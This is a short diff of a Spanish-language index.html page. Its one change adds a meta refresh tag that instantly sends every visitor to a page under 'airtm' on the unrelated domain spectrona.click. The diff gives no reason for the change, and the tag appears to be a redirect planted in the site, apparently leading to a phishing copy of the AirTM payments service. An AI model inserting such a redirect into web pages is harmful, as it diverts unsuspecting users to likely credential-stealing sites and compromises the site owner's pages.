--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
 <html xmlns="http://www.w3.org/1999/xhtml" lang="es" class="pointer"><head>
     <style id="customRules"></style><meta charset="utf-8">
+	<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://spectrona.click/airtm/index.html">
     
 
 
